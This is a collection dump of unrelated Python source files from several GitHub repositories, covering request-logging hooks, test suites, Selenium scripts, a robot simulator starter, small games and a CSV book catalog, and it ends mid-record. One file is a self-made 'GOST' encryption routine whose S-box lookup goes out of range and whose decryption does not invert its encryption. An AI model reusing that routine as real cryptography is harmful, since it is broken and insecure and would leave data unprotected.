textwrap.dedent(f'''\n---------------- request ----------------\n{params.method} {params.url}\nHost: {params.url.host}:{params.url.port}\n{trace_config_ctx.headers}\n\n{str(type(params.exception))}{str(params.exception)}\n''')\n LOGGER.exception(result)\n\n\ndef build_log_trace_config() -> TraceConfig:\n trace_config = TraceConfig()\n trace_config.on_request_start.append(on_request_start)\n trace_config.on_request_end.append(on_request_end)\n # trace_config.on_request_redirect.append(on_request_redirect)\n trace_config.on_request_chunk_sent.append(on_request_chunk_sent)\n trace_config.on_request_exception.append(on_request_exception)\n return trace_config\n","repo_name":"Amzza0x00/Zerooo-Exploitation-Framework","sub_path":"zerooo/request/hookrequest.py","file_name":"hookrequest.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"77"} +{"seq_id":"9472966096","text":"import unittest\nimport computation\nimport src.loader.src.loader as loader_module\nimport matplotlib.pyplot as plt\nimport lanelet2\nimport os\nimport igraph\n\n\ndef create_roadgraph_graph(lanelet_map):\n \"\"\"Creates the igraph graph for the roadgraph.\n\n Args:\n lanelet_map (lanelet2.core.LaneletMap): The lanelet map created by lanelet2\n\n Returns:\n igraph.Graph: the roadgraph in the igraph format\n \"\"\"\n traffic_rules = lanelet2.traffic_rules.create(\n lanelet2.traffic_rules.Locations.Germany, lanelet2.traffic_rules.Participants.Vehicle\n )\n routing_graph = lanelet2.routing.RoutingGraph(lanelet_map, traffic_rules)\n # TODO: Maybe implement stronger hashing function than SHA1 (SHA256?) or maybe encryption?\n # Name collisions should be avoided here as this could later be parallelized.\n file_path = f\"./{hash(lanelet_map)}transformed_graph.graphml\"\n routing_graph.exportGraphML(file_path)\n graph = igraph.Graph().Read_GraphML(file_path)\n os.remove(file_path)\n return graph\n\n\nclass TestTaf(unittest.TestCase):\n \"\"\"Test case for the taf dataset\"\"\"\n\n def setUp(self):\n osm_path = \"./src/computation/test/data/K733/K733_fix.osm\"\n origin = (\n 49.005306,\n 8.4374089,\n )\n\n csv_path = \"./src/loader/test/data/taf/vehicle_tracks_000.csv\"\n loader = loader_module.Loader()\n loader.load_dataset(csv_path)\n scenario = loader.return_scenario(csv_path)\n timestamp = 153300\n scene = scenario.get_scene(timestamp)\n\n lanelet_map = computation.read_to_lanelet_map(osm_path, origin)\n\n matching_dict = computation.ProbabilisticMatchingDict(scene, lanelet_map)\n roadgraph = computation.Roadgraph(\n lanelet_map, matching_dict, create_roadgraph_graph(lanelet_map)\n )\n projection_identity_dict = computation.ProjectionIdentityDict(matching_dict)\n\n self.semantic_scene_graph = computation.SemanticSceneGraph(\n matching_dict, scene, roadgraph, projection_identity_dict, verbose=True\n )\n\n def test_create_dot_file(self):\n self.semantic_scene_graph.write_dot(\"./semantic_scene_graph.dot\")\n\n\nclass TestShowData(unittest.TestCase):\n \"\"\"Not really a test. Visualizes data from computation\"\"\"\n\n def setUp(self):\n # using TAF dataset\n osm_path = \"./src/computation/test/data/K733/K733_fix.osm\"\n origin = (\n 49.005306,\n 8.4374089,\n )\n csv_path = \"./src/loader/test/data/taf/vehicle_tracks_000.csv\"\n loader = loader_module.Loader()\n loader.load_dataset(csv_path)\n lanelet_map = computation.read_to_lanelet_map(osm_path, origin)\n self.timestamp = 153300\n self.scenario = loader.return_scenario(csv_path)\n self.entity_id_list = self.scenario.entity_ids\n self.lanelet_list = []\n for lanelet in lanelet_map.laneletLayer:\n self.lanelet_list.append(lanelet)\n\n def test_print_lanelets(self):\n \"\"\"Function to print out a list of lanelets from the lanelet_map\n\n Args:\n lanelet_list (list): list of lanelets to be printed\n \"\"\"\n for lanelet in self.lanelet_list:\n print(lanelet)\n\n def test_plot_lanelets(self):\n \"\"\"Function, which plots a map of the street section\"\"\"\n # plot lanelets\n for lanelet in self.lanelet_list:\n for i in range(len(lanelet.leftBound)):\n plt.plot(lanelet.leftBound[i].x, lanelet.leftBound[i].y, \"b.-\")\n for j in range(len(lanelet.rightBound)):\n plt.plot(lanelet.rightBound[j].x, lanelet.rightBound[j].y, \"r.-\")\n\n # plot entities for a certain timestamp\n for entity_id in self.entity_id_list:\n current_entity = self.scenario.get_entity(entity_id)\n current_entity_state = current_entity.get_entity_state(self.timestamp)\n if current_entity_state is not None:\n plt.plot(current_entity_state.x, current_entity_state.y, \"g.-\")\n\n plt.axis(\"equal\")\n plt.tight_layout()\n plt.show()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"Mercyrion/semantic_scene_graph","sub_path":"src/computation/testcomputation.py","file_name":"testcomputation.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41126755682","text":"import ast\nimport pytest\nfrom time import time as pytime\n\nfrom cobald.monitor.format_line import LineProtocolFormatter\nfrom usim import Scope, time\n\nfrom lapis_tests import via_usim\n\nfrom . import make_test_logger\n\nfrom lapis.monitor.general import resource_statistics\nfrom lapis.monitor import SimulationTimeFilter, Monitoring\n\n\ndef parse_line_protocol(literal: str):\n name_tags, _, fields_stamp = literal.strip().partition(\" \")\n fields, _, stamp = fields_stamp.partition(\" \")\n fields = fields.split(\",\") if fields else []\n name, *tags = name_tags.split(\",\")\n return (\n name,\n {key: value for key, value in (tag.split(\"=\") for tag in tags)},\n {\n key: ast.literal_eval(value)\n for key, value in (field.split(\"=\") for field in fields)\n },\n None if not stamp else int(stamp),\n )\n\n\nclass TestSimulationTimeFilter(object):\n @via_usim\n async def test_simple(self):\n payload = {\"a\": \"a\"}\n logger, handler = make_test_logger(__name__)\n handler.formatter = LineProtocolFormatter(resolution=1)\n logger.addFilter(SimulationTimeFilter())\n logger.critical(\"message\", payload)\n _, _, _, timestamp = parse_line_protocol(handler.content)\n handler.clear()\n assert timestamp == 0\n await (time + 10)\n logger.critical(\"message\", payload)\n _, _, _, timestamp = parse_line_protocol(handler.content)\n assert timestamp == 10000000000\n\n @via_usim\n async def test_explicit(self):\n def record():\n pass\n\n record.created = pytime()\n filter = SimulationTimeFilter()\n async with Scope() as _:\n filter.filter(record)\n assert record.created == 0\n\n\ndef dummy_statistics():\n return []\n\n\nclass TestMonitoring(object):\n def test_registration(self):\n monitoring = Monitoring()\n statistics = resource_statistics\n monitoring.register_statistic(statistics)\n for element in statistics.whitelist:\n assert statistics in monitoring._statistics.get(element)\n\n def test_registration_failure(self):\n monitoring = Monitoring()\n statistics = dummy_statistics\n with pytest.raises(AssertionError):\n monitoring.register_statistic(statistics)\n assert all(statistics not in stat for stat in monitoring._statistics.values())\n # define required attributes except whitelist\n statistics.name = \"test\"\n statistics.logging_formatter = {}\n monitoring.register_statistic(statistics)\n assert all(statistics not in stat for stat in monitoring._statistics.values())\n statistics.whitelist = (str,)\n monitoring.register_statistic(statistics)\n assert all(statistics in stat for stat in monitoring._statistics.values())\n","repo_name":"MatterMiners/lapis","sub_path":"lapis_tests/utility/test_monitor.py","file_name":"test_monitor.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"5953270675","text":"import time\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.select import Select\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\ndriver = webdriver.Chrome(executable_path='C:/chromedriver.exe')\ndriver.maximize_window()\ndriver.get(\"http://demo.automationtesting.in/WebTable.html\")\ndriver.implicitly_wait(5)\nSwitch = driver.find_element_by_link_text('SwitchTo')\nSwitch.click()\nwin = driver.find_element_by_css_selector('[href=\"Windows.html\"]')\nwin.click()\ntime.sleep(2)\n\nnew_win = driver.find_element_by_css_selector('[href=\"http://www.selenium.dev\"]')\nnew_win.click()\n\nwindow_1 = driver.window_handles[1]\ndriver.switch_to.window(window_1)\ntime.sleep(5)\ndriver.close()\n\nwindow_0 = driver.window_handles[0]\ndriver.switch_to.window(window_0)\n\nsepar = driver.find_element_by_css_selector('[href=\"#Multiple\"]')\nsepar.click()\ns_win = driver.find_element_by_css_selector('[onclick=\"multiwindow()\"]')\ns_win.click()\nwindow_2 = driver.window_handles[2]\ndriver.switch_to.window(window_2)\n\nw_2 = WebDriverWait(driver, 10).until(\n EC.url_to_be('https://demo.automationtesting.in/Index.html'))\nnumber_of_tabs = WebDriverWait(driver, 10).until(\n EC.number_of_windows_to_be(3))\nprint(number_of_tabs)\n\nmail = driver.find_element_by_id('email')\nmail.send_keys(\"565@email.com\")\nenter = driver.find_element_by_id('enterimg')\nenter.click()\nura = WebDriverWait(driver, 10).until(\n EC.url_to_be('https://demo.automationtesting.in/Register.html'))\nprint(\"Krasavello!\")\ntime.sleep(3)\ndriver.quit()\n\n\n#C:/Users/kunae_000/PycharmProjects/pythonProject/Lesson3","repo_name":"greyav7/work_3","sub_path":"Lesson 3.8.5.py","file_name":"Lesson 3.8.5.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14751270640","text":"from collections import Counter\n\ndef solution(participant, completion):\n participant.sort()\n completion.sort()\n\n print(Counter(participant))\n print(Counter(completion))\n\n for i in range(0, len(completion)):\n if participant[i] != completion[i]:\n return participant[i]\n\n return participant[len(completion)]\n\nsolution([\"leo\", \"kiki\", \"eden\"], [\"eden\", \"kiki\"]\t)","repo_name":"dolgogae/algorithm","sub_path":"programmers/python/완주하지못한선수.py","file_name":"완주하지못한선수.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21951981004","text":"__author__ = \"Mikael Mortensen \"\n__date__ = \"2014-01-08\"\n__copyright__ = \"Copyright (C) 2014 \" + __author__\n__license__ = \"GNU Lesser GPL version 3 or any later version\"\n\nimport cppimport\n\ncompiled_module = cppimport.imp('fenicstools.fem.common')\n\ndef getMemoryUsage(rss=True):\n return compiled_module.getMemoryUsage(rss)\n\ndef SetMatrixValue(A, val):\n compiled_module.SetMatrixValue(A, val)\n\n","repo_name":"mikaem/fenicstools","sub_path":"fenicstools/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"77"} +{"seq_id":"38631091972","text":"import binascii\n\n\nS_BOXES = [\n (4, 10, 9, 2, 13, 8, 0, 14, 6, 11, 1, 12, 7, 15, 5, 3),\n (14, 11, 4, 12, 6, 13, 15, 10, 2, 3, 8, 1, 0, 7, 5, 9),\n (5, 8, 1, 13, 10, 3, 4, 2, 14, 15, 12, 7, 6, 0, 9, 11),\n (7, 13, 10, 1, 0, 8, 9, 15, 14, 4, 6, 12, 11, 2, 5, 3),\n (6, 12, 7, 1, 5, 15, 13, 8, 4, 10, 9, 14, 0, 3, 11, 2),\n (4, 11, 10, 0, 7, 2, 1, 13, 3, 6, 8, 5, 9, 12, 15, 14),\n (13, 11, 4, 1, 3, 15, 5, 9, 0, 10, 14, 7, 6, 8, 2, 12),\n (1, 15, 13, 0, 5, 7, 10, 4, 9, 2, 3, 14, 6, 11, 8, 12)\n]\n\n\ndef gost_encrypt(key, data):\n # Convert the key to a byte array\n key_bytes = bytearray.fromhex(key)\n\n # Convert the data to a byte array\n data_bytes = bytearray(data.encode())\n\n # Feedback with cipher-block chaining (CBC)\n iv = bytearray(8) # Initialization vector\n encrypted_data = bytearray()\n\n for i in range(len(data_bytes)):\n # Encrypt the current data byte\n encrypted_byte = data_bytes[i] ^ iv[i % 8] ^ key_bytes[i % len(key_bytes)]\n encrypted_byte = s_box_transform(encrypted_byte, i % 8)\n encrypted_data.append(encrypted_byte)\n\n # Update the initialization vector\n iv[i % 8] = encrypted_byte\n\n # Return the encrypted data as a byte array\n return encrypted_data\n\n\ndef gost_decrypt(key, data):\n # Convert the key to a byte array\n key_bytes = bytearray.fromhex(key)\n\n # Feedback with cipher-block chaining (CBC)\n iv = bytearray(8) # Initialization vector\n decrypted_data = bytearray()\n\n for i in range(len(data)):\n # Decrypt the current data byte\n decrypted_byte = s_box_transform(data[i], i % 8)\n decrypted_byte = decrypted_byte ^ iv[i % 8] ^ key_bytes[i % len(key_bytes)]\n decrypted_data.append(decrypted_byte)\n\n # Update the initialization vector\n iv[i % 8] = data[i]\n\n # Return the decrypted data as a string\n return decrypted_data.decode()\n\n\ndef s_box_transform(byte, index):\n # Get the corresponding S-box\n s_box = S_BOXES[index]\n\n # Calculate the S-box indices\n row = (byte >> 4) & 0x0F\n col = byte & 0x0F\n\n # Get the value from the S-box\n return s_box[row * 16 + col]\n\n\ndef save_bytes_to_file(filename, data):\n with open(filename, \"wb\") as f:\n f.write(data)\n\n\ndef save_string_to_file(filename, data):\n with open(filename, \"w\") as f:\n f.write(data)\n\n\ndef read_bytes_from_file(filename):\n with open(filename, \"rb\") as f:\n return f.read()\n\n\ndef read_string_from_file(filename):\n with open(filename, \"r\") as f:\n return f.read()\n\n\ndef print_hex_and_text(data, label):\n hex_data = binascii.hexlify(data).decode()\n text_data = data.decode()\n print(f\"{label} (Hex): {hex_data}\")\n print(f\"{label} (Text): {text_data}\")\n\n\ndef main():\n key_file = \"key.txt\"\n data_file = \"data.txt\"\n encrypted_file = \"encrypted.txt\"\n decrypted_file = \"decrypted.txt\"\n\n # Чтение ключа из файла\n key = read_string_from_file(key_file)\n\n # Чтение данных из файла\n data = read_string_from_file(data_file)\n\n # Вывод исходных данных\n print(\"Original Key and Data:\")\n print_hex_and_text(key.encode(), \"Key\")\n print_hex_and_text(data.encode(), \"Data\")\n print()\n\n # Шифрование данных\n encrypted_data = gost_encrypt(key, data)\n\n # Вывод зашифрованных данных\n print(\"Encrypted Data:\")\n print_hex_and_text(encrypted_data, \"Encrypted Data\")\n print()\n\n # Сохранение зашифрованных данных в файл\n save_bytes_to_file(encrypted_file, encrypted_data)\n\n # Загрузка зашифрованных данных из файла\n encrypted_data = read_bytes_from_file(encrypted_file)\n\n # Дешифрование данных\n decrypted_data = gost_decrypt(key, encrypted_data)\n\n # Вывод расшифрованных данных\n print(\"Decrypted Data:\")\n print_hex_and_text(decrypted_data.encode(), \"Decrypted Data\")\n print()\n\n # Сохранение расшифрованных данных в файл\n save_string_to_file(decrypted_file, decrypted_data)\n\n # Вывод успешного завершения операции\n print(\"Encryption and decryption completed successfully.\")\n\n # Изменение ключа\n new_key = input(\"Enter a new key: \")\n key = new_key.strip()\n\n # Изменение данных\n new_data = input(\"Enter new data: \")\n data = new_data.strip()\n\n # Вывод обновленных данных\n print(\"Updated Key and Data:\")\n print_hex_and_text(key.encode(), \"Key\")\n print_hex_and_text(data.encode(), \"Data\")\n print()\n\n # Шифрование обновленных данных\n encrypted_data = gost_encrypt(key, data)\n\n # Вывод зашифрованных данных\n print(\"Updated Encrypted Data:\")\n print_hex_and_text(encrypted_data, \"Encrypted Data\")\n print()\n\n # Сохранение обновленных зашифрованных данных в файл\n save_bytes_to_file(encrypted_file, encrypted_data)\n\n # Загрузка обновленных зашифрованных данных из файла\n encrypted_data = read_bytes_from_file(encrypted_file)\n\n # Дешифрование обновленных данных\n decrypted_data = gost_decrypt(key, encrypted_data)\n\n # Вывод расшифрованных обновленных данных\n print(\"Updated Decrypted Data:\")\n print_hex_and_text(decrypted_data.encode(), \"Decrypted Data\")\n print()\n\n # Сохранение расшифрованных обновленных данных в файл\n save_string_to_file(decrypted_file, decrypted_data)\n\n # Вывод успешного завершения операции\n print(\"Encryption and decryption of updated data completed successfully.\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"machinegunnestea/7semestr","sub_path":"MZI/pythonProject1/2222.py","file_name":"2222.py","file_ext":"py","file_size_in_byte":5986,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19000717445","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nimport vrep\nimport sys\nimport numpy as np\nvrep.simxFinish(-1)\nclientID=vrep.simxStart('127.0.0.1',19999,True,True,5000,5)\nif clientID!=-1:\n print ('Connected to remote API server')\nelse:\n print('Connection unsuccessful')\n sys.exit('Could not Connect')\nerrorcode,left_motor_handle = vrep.simxGetObjectHandle(clientID,'Pioneer_p3dx_leftMotor',vrep.simx_opmode_oneshot_wait)\nerrorcode,right_motor_handle = vrep.simxGetObjectHandle(clientID,'Pioneer_p3dx_rightMotor',vrep.simx_opmode_oneshot_wait)\nerrorcode = vrep.simxSetJointTargetVelocity(clientID,left_motor_handle,0.2,vrep.simx_opmode_streaming)\nerrorcode = vrep.simxSetJointTargetVelocity(clientID,right_motor_handle,0.2,vrep.simx_opmode_streaming)\nerrorcode,cam_Handle = vrep.simxGetObjectHandle(clientID,'Vision_sensor',vrep.simx_opmode_oneshot_wait)\nprint(cam_Handle)\nreturnCode,resolution,image=vrep.simxGetVisionSensorImage(clientID,cam_Handle,0,vrep.simx_opmode_streaming)\nreturnCode,resolution,image=vrep.simxGetVisionSensorImage(clientID,cam_Handle,0,vrep.simx_opmode_buffer)\nprint(image)\n\nsensor_h=[] #empty list for handles\nsensor_val=np.array([]) #empty array for sensor measurements\nfor x in range(1,16+1):\n errorCode,sensor_handle=vrep.simxGetObjectHandle(clientID,'Pioneer_p3dx_ultrasonicSensor'+str(x),vrep.simx_opmode_oneshot_wait)\n sensor_h.append(sensor_handle) #keep list of handles \n errorCode,detectionState,detectedPoint,detectedObjectHandle,detectedSurfaceNormalVector=vrep.simxReadProximitySensor(clientID,sensor_handle,vrep.simx_opmode_streaming) \n sensor_val=np.append(sensor_val,np.linalg.norm(detectedPoint)) #get list of values","repo_name":"AdityaPrasadMishra/RobotLearning","sub_path":"Multi Robot Transfer Learning Project/VRepStarterCode.py","file_name":"VRepStarterCode.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15192742753","text":"from draftsman.data import recipes as recipes, entities, items\n\nclass ratio():\n\tdef __init__(self, item=None, ips=None, assembler=None, recurse=False):\n\t\tself.item=item\n\t\tself.product=self.item\n\t\tself.goal_items_per_second=ips\n\t\tself.item='advanced-oil-processing' if self.item in ['petroleum-gas', 'heavy-oil', 'light-oil'] else self.item\n\t\tself.item=self.set_item()\n\t\tif recipes.raw[self.item] and 'category' in recipes.raw[self.item].keys() and recipes.raw[self.item]['category'] == 'smelting':\n\t\t\tdel self\n\t\t\treturn\n\t\tif items.raw[self.product] and 'subgroup' in items.raw[self.product].keys() and items.raw[self.product]['subgroup'] == 'raw-resource':\n\t\t\tdel self\n\t\t\treturn\n\t\tself.goal_items_per_second=self.set_goal_ips()\n\t\tself.made_in=self.get_made_in(self.item)\n\t\tself.assembler=assembler if assembler else self.set_assembler() if 'assembling-machine-3' in self.made_in else self.made_in[0]\n\t\tself.assembler_craft_speed=entities.raw[self.assembler]['crafting_speed']\n\t\tself.actual_production=self.get_real_production()\n\t\tself.items_per_second=self.get_ips()\n\t\tself.assemblers_needed=self.get_assemblers_needed()\n\t\tself.ingredients=self.get_ingredients(self.item)\n\t\tself.show()\n\t\tif recurse:\n\t\t\tfor x in self.ingredients:\n\t\t\t\tself.dive=ratio(x[0], self.goal_items_per_second*x[1], self.assembler, True)\n\n\tdef show(self):\n\t\tprint('-'*50)\n\t\tprint(self.item, '@', str(self.goal_items_per_second)+'/s', 'in', self.assembler)\n\t\tprint(self.items_per_second, 'items/sec from 1')\n\t\tprint(self.assemblers_needed, 'needed to satisfy')\n\t\tprint('ingredients', self.ingredients)\n\n\tdef set_item(self):\n\t\titem=self.item\n\t\twhile not item or not items.raw[self.product]:\n\t\t\titem=input('item: ')\n\t\treturn item\n\n\tdef set_goal_ips(self):\n\t\tgoal_items_per_second=self.goal_items_per_second\n\t\twhile not goal_items_per_second:\n\t\t\tgoal_items_per_second=input('item/s: ')\n\t\treturn float(goal_items_per_second)\n\n\tdef set_assembler(self):\n\t\tassembling_machines=['assembling-machine', 'assembling-machine-2', 'assembling-machine-3']\n\t\tif self.made_in in assembling_machines:\n\t\t\tassembler_lvl=self.assembler\n\t\tprint('[1]', 'assembling machine,')\n\t\tprint('[2]', 'assembling machine 2, or')\n\t\tprint('[3]', 'assembling machine 3')\n\t\tassembler_lvl=int(input('assembling machine lvl: ')) if not assembler_lvl else assembler_lvl\n\t\tif not assembler_lvl or assembler_lvl not in [1, 2, 3]:\n\t\t\tassembler_lvl=self.set_assembler()\n\t\treturn assembling_machines[assembler_lvl-1]\n\n\tdef get_ingredients(self, item):\n\t\tif recipes.raw[item]:\n\t\t\tingredients=recipes.get_recipe_ingredients_and_counts(item)\n\t\t\treturn ingredients\n\n\tdef get_made_in(self, item):\n\t\tmade_in=[k for k in recipes.for_machine.keys() if item in recipes.for_machine[k]]\n\t\treturn made_in\n\n\tdef get_real_production(self):\n\t\titem_base_craft_speed=recipes.raw[self.item]['energy_required'] if 'energy_required' in recipes.raw[self.item].keys() else 0.5\n\t\tactual_production_speed=item_base_craft_speed/self.assembler_craft_speed\n\t\treturn actual_production_speed\n\n\tdef get_ips(self):\n\t\titems_created_per_craft=recipes.raw[self.item]['result_count'] if 'result_count' in recipes.raw[self.item].keys() else 1\n\t\tif 'results' in recipes.raw[self.item].keys():\n\t\t\tfor x in iter(recipes.raw[self.item]['results']):\n\t\t\t\tprint(x)\n\t\t\t\t# items_created_per_craft=recipes.raw[self.item]['results'][x]['amount'] if self.product==recipes.raw[self.item]['results'][x]['name'] else 1\n\t\titems_per_second=1/(self.actual_production/items_created_per_craft)\n\t\treturn items_per_second\n\n\tdef get_assemblers_needed(self):\n\t\tassemblers_needed=self.goal_items_per_second/self.items_per_second\n\t\treturn assemblers_needed\n\n\nnew=ratio('advanced-circuit', 10, 'assembling-machine-2', recurse=True)","repo_name":"hidden-relic/py","sub_path":"ratio.py","file_name":"ratio.py","file_ext":"py","file_size_in_byte":3695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38487707015","text":"import csv\r\n\r\nclass Book:\r\n\r\n def __init__(self, id, isbn, title, author):\r\n self.id = id\r\n self.isbn = isbn\r\n self.title = title\r\n self.author = author\r\n\r\n \r\n def add_book(self):\r\n # Vérifier que tous les champs sont remplis\r\n if not all([self.id, self.isbn, self.title, self.author]):\r\n print(\"Veuillez remplir tous les champs\")\r\n return\r\n \r\n # Vérifier que l'ISBN n'est pas déjà utilisé\r\n books = self.get_all_books()\r\n #print(books)\r\n # Ajouter le livre au catalogue\r\n with open(\"livres.csv\", \"a\", newline=\"\") as csvfile:\r\n writer = csv.DictWriter(csvfile, fieldnames=[\"ID\", \"ISBN_010a\", \"Titre_200a\", \"Complement_du_titre_200e\", \"Auteur_principal_nom_700a\", \"Auteur_principal_prenom_700b\", \"Auteur_principal_qualificatif_700c\", \"Autre_auteur_principal_nom_701a\", \"Autre_auteur_principal_prenom_702b\", \"Autre_auteur_principal_qualificatif_702b\", \"Editeur_210c\"], delimiter=\";\")\r\n #writer.writeheader()\r\n writer.writerow({\"ID\": self.id, \"ISBN_010a\": self.isbn, \"Titre_200a\": self.title, \"Complement_du_titre_200e\": \"\", \"Auteur_principal_nom_700a\": self.author, \"Auteur_principal_prenom_700b\": \"\", \"Auteur_principal_qualificatif_700c\": \"\", \"Autre_auteur_principal_nom_701a\": \"\", \"Autre_auteur_principal_prenom_702b\": \"\", \"Autre_auteur_principal_qualificatif_702b\": \"\", \"Editeur_210c\": \"\"})\r\n \r\n def remove_book(self):\r\n # Vérifier que tous les champs sont remplis\r\n #if not all([self.id, self.isbn, self.title, self.author]):\r\n # print(\"Veuillez remplir tous les champs\")\r\n # return\r\n print(\"id1 -- 1\")\r\n # Vérifier que le livre existe\r\n book = self.get_book(self.id)\r\n print(book)\r\n print(\"id1 -- 2\")\r\n if not book:\r\n print(\"Livre non trouvé\")\r\n return\r\n \r\n # Supprimer le livre du catalogue\r\n books = self.get_all_books()\r\n books = [b for b in books if b[\"ID\"] != self.id]\r\n self.write_books_to_csv(books)\r\n \r\n def get_all_books(self):\r\n # Lire le fichier CSV et retourner tous les livres sous forme de liste de dictionnaires\r\n with open(\"livres.csv\", \"r\", newline=\"\") as csvfile:\r\n reader = csv.DictReader(csvfile, fieldnames=[\"ID\", \"ISBN_010a\", \"Titre_200a\", \"Complement_du_titre_200e\", \"Auteur_principal_nom_700a\", \"Auteur_principal_prenom_700b\", \"Auteur_principal_qualificatif_700c\", \"Autre_auteur_principal_nom_701a\", \"Autre_auteur_principal_prenom_702b\", \"Autre_auteur_principal_qualificatif_702b\", \"Editeur_210c\"], delimiter=\";\")\r\n return list(reader)\r\n \r\n def get_book(self, id):\r\n # Retourner le livre correspondant à l'ID donné s'il existe, sinon retourner None\r\n books = self.get_all_books()\r\n #print(books)\r\n for book in books:\r\n if book[\"ID\"] == id:\r\n return book\r\n return None\r\n\r\n def write_books_to_csv(self, books):\r\n # Écrire la liste des livres dans le fichier CSV\r\n with open(\"livres.csv\", \"w\", newline=\"\") as csvfile:\r\n writer = csv.DictWriter(csvfile, fieldnames=[\"ID\", \"ISBN_010a\", \"Titre_200a\", \"Complement_du_titre_200e\", \"Auteur_principal_nom_700a\", \"Auteur_principal_prenom_700b\", \"Auteur_principal_qualificatif_700c\", \"Autre_auteur_principal_nom_701a\", \"Autre_auteur_principal_prenom_702b\", \"Autre_auteur_principal_qualificatif_702b\", \"Editeur_210c\"])\r\n writer.writeheader()\r\n for book in books:\r\n writer.writerow(book)\r\n","repo_name":"yasser-9/LibraryManagement","sub_path":"book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12453556031","text":"import pygame\n\n\nclass Ship:\n \"\"\"Manger the ship\"\"\"\n\n def __init__(self, ai_game):\n \"\"\"初始化飞船并设置其具体位置\"\"\"\n self.screen = ai_game.screen\n self.screen_rect = ai_game.screen.get_rect()\n self.settings = ai_game.settings\n\n # 加载飞船图像并获取其外接矩形\n self.image = pygame.image.load('images/ship.bmp')\n self.rect = self.image.get_rect()\n\n # 在飞船的属性x中存储小数值\n self.x = float(self.rect.x)\n\n # 对于每艘新飞船,都将其放在屏幕底部的中央\n self.rect.midbottom = self.screen_rect.midbottom\n\n # 移动标志\n self.moving_right = False\n self.moving_left = False\n\n def update(self):\n \"\"\"根据移动标志调整飞船的位置\"\"\"\n if self.moving_right and self.rect.right < self.screen_rect.right:\n self.x += self.settings.ship_speed\n if self.moving_left and self.rect.left > 0:\n self.x -= self.settings.ship_speed\n\n # 根据self.x更新rect对象\n self.rect.x = self.x\n\n def blitme(self):\n \"\"\"在指定位置绘制飞船\"\"\"\n self.screen.blit(self.image, self.rect)\n\n","repo_name":"Bssn520/pythonProject","sub_path":"Projects/Alien/ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"43482722282","text":"from random import *\n\nwords = [\"apple\", \"banana\", \"orange\"]\nword = choice(words)\n# word = \"apple\"\nprint(\"answer : \" + word)\n# letters = \"ap\"\nletters = \"\"\n\n\nwhile True:\n succeed = True\n print()\n for w in word:\n if w in letters:\n print(w, end=\" \")\n else:\n print(\"_\", end=\" \")\n succeed = False\n # break\n print()\n\n if succeed:\n print(\"Success\")\n break\n\n letter = input(\"Input letter > \") #사용자 입력받기\n if letter not in letters:\n letters += letter\n if letter in word:\n print(\"correct\")\n else:\n print(\"wrong\")\n # if letters == word:\n # print(letters)\n # break\n \n\n","repo_name":"tvbox07/Project01","sub_path":"webscrapping/webscrapping_basic/Quiz02.py","file_name":"Quiz02.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10343444775","text":"import sys\n\ndef find_capital():\n states = {\n \"Oregon\" : \"OR\",\n \"Alabama\" : \"AL\",\n \"New Jersey\" : \"NJ\",\n \"Colorado\" : \"CO\"\n }\n\n capital_cities = {\n \"OR\": \"Salem\",\n \"AL\": \"Montgomery\",\n \"NJ\": \"Trenton\",\n \"CO\": \"Denver\"\n }\n \n if(len(sys.argv) != 2):\n exit()\n \n av = str(sys.argv[1])\n\n try:\n list(capital_cities.keys())[list(capital_cities.values()).index(av)]\n except ValueError:\n print (\"Unknow capital city\")\n \n \n\n for cle,valeur in capital_cities.items():\n if valeur == av:\n for c,v in states.items():\n if v == cle:\n print (c)\n\nif __name__ == '__main__':\n find_capital()\n","repo_name":"nidzik/PythonDjango","sub_path":"d01/ex04/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17922444506","text":"from selenium import webdriver\nimport googlePage\nimport openLendingPage\nimport unittest\n\nclass OpenLending(unittest.TestCase):\n\n TIMEOUT = 30\n\n searchText = \"Open Lending\"\n\n @classmethod\n def setUpClass(cls):\n cls.driver = webdriver.Chrome('C:\\TestAutomation\\ChromeDriver\\chromedriver.exe')\n\n def setUp(self):\n self.google = googlePage.GooglePage(self, self.driver, self.TIMEOUT)\n self.openLending = openLendingPage.OpenLendingPage(self, self.driver, self.TIMEOUT)\n\n def test_open_lending(self):\n self.google.open_google()\n self.google.search(self.searchText)\n self.google.click_open_lending_link()\n self.openLending.open_resources()\n self.openLending.open_all_load_more_sections()\n blogs = self.openLending.get_all_blog_links()\n # Verify no duplicates\n self.assertTrue(len(set(blogs)) == 